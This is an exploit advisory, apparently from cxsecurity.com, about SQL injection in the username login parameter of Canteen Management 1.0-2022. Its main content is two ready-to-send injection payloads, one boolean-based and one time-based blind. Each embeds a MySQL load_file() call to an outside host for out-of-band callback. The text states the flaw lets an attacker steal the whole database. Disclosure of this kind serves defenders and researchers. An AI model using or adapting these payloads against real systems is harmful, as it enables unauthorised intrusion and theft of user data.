Canteen Management 1.0-2022 SQL Injection

2022.10.04
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: Canteen-Management1.0-2022 SQLi ## Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi ## Description: The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) ## Proof and Exploit: [href](https://streamable.com/vvz2lh) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top